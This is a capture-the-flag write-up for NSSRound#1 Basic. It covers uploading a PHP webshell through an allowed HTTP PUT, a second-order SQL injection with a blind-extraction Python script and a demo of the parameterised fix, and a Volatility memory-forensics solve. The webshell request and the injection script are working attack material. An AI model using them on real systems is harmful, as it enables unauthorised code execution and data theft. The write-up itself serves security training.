[NSSRound#1 Basic]
2022-08-04 05:27:00 【Ki10Moc】
WEB
basic_check
Found that the PUT method is allowed:
PUT /shell.php HTTP/1.1
Host: 1.14.71.254:28848
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

<?php eval($_POST[1]);?>
This writes a one-line webshell; from there it is RCE.
[NSSRound#1 Basic]sql_by_sql
Register an account first; inside there is a change-password feature, which suggests a second-order injection.
Source at the change-password page:
<!-- update user set password='%s' where username='%s'; -->
Register a new account named admin--+ to obtain the admin identity.
Then query at /query:
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Time : 2022/8/3 21:42
# @Author : ki10Moc
# @FileName: [NSSRound#1 Basic]sql_by_sql.py
# @Software: PyCharm
# Link: ki10.top
import requests
import string

# candidate characters (renamed from `str` so the builtin is not shadowed);
# braces, underscore and hyphen are added so a typical flag format ends the loop cleanly
charset = string.ascii_letters + string.digits + "{}_-"
url = "http://1.14.71.254:28697/query"
s = requests.session()
headers = {
    'Cookie': 'session=eyJyb2xlIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.YklOVg.Pz554uNEiaxxBCpP4pm7-G8iucg'}

if __name__ == "__main__":
    name = ''
    # SQLite substr() positions are 1-based, so start at 1
    for i in range(1, 100):
        char = ''
        for j in charset:
            # table + columns
            #payload = "1 and substr((select sql from sqlite_master limit 1,1),{},1)='{}'".format(i, j)
            # data
            payload = "1 and substr((select flag from flag limit 0,1),{},1)='{}'".format(i, j)
            data = {"id": payload}
            r = s.post(url=url, data=data, headers=headers)
            #print(r.text)
            if "exist" in r.text:
                name += j
                print(j, end='')
                char = j
                break
        # no candidate matched at this position: the value has been read completely
        if char == '':
            break
    print()
    print(name)
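The second-order injection behind the change-password step, as an added example (not the challenge's or the author's code): the update template from the HTML comment is run against an in-memory SQLite table, first built with string formatting and then with bound parameters. The table, the admin row and the registered name admin'-- are constructed for this demo; the page shows the name as admin--+, so the quote is an assumption.

```python
import sqlite3

# Query template copied from the HTML comment on the change-password page:
#   update user set password='%s' where username='%s';
VULNERABLE_UPDATE = "update user set password='%s' where username='%s';"
# Same update with bound parameters (the fix).
SAFE_UPDATE = "update user set password=? where username=?;"

# Constructed for this demo: the page shows the name as admin--+; the
# closing quote is assumed to have been lost in extraction.
CRAFTED_NAME = "admin'--"


def make_db():
    """In-memory user table with a constructed admin row (sample data)."""
    con = sqlite3.connect(":memory:")
    con.execute("create table user (username text primary key, password text, role integer)")
    con.execute("insert into user values ('admin', 'admin-original', 1)")
    return con


def register(con, username, password):
    # Registration binds its values, so the crafted name is stored verbatim and
    # nothing happens yet: the injection fires later, in a query that re-uses it.
    con.execute("insert into user values (?, ?, 0)", (username, password))


def change_password_vulnerable(con, username, new_password):
    # String formatting reproduces the bug. With CRAFTED_NAME the statement reads
    #   ... where username='admin'--';
    # and the comment swallows the closing quote, so the admin row is updated.
    con.execute(VULNERABLE_UPDATE % (new_password, username))


def change_password_safe(con, username, new_password):
    # The username is bound as data and is never parsed as SQL.
    con.execute(SAFE_UPDATE, (new_password, username))


def password_of(con, username):
    row = con.execute("select password from user where username=?", (username,)).fetchone()
    return row[0] if row else None


def demo():
    """Return admin's password after the vulnerable update and after the safe one."""
    vuln, safe = make_db(), make_db()
    for con, change in ((vuln, change_password_vulnerable), (safe, change_password_safe)):
        register(con, CRAFTED_NAME, "whatever")
        change(con, CRAFTED_NAME, "pwned")
    return password_of(vuln, "admin"), password_of(safe, "admin")
```

With the formatted query the admin password becomes "pwned" although only the crafted account was ever touched; with placeholders only that account's own row changes.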
MISC
cut_into_thirds
python vol.py -f ./cut_into_thirds.raw imageinfo
This gives the version, i.e. the profile:
python vol.py -f ./cut_into_thirds.raw --profile=Win7SP1x64 pslist
One process here stands out. Dump its memory:
python vol.py -f ./cut_into_thirds.raw --profile=Win7SP1x64 memdump -p 1164 -D ./
foremost
Carving with foremost yields part1:
part1:3930653363343839PK?
Dump the target executable directly:
python vol.py -f ./cut_into_thirds.raw --profile=Win7SP1x64 procdump -p 1164 -D ./
and search it for related information:
strings ./executable.1164.exe
This gives part2:
part2:GRRGGYJNGQ4GKMBNMJRTONI=
Finally, look at the user information to get part3.
Decode the three parts with base16, base32 and base64 respectively.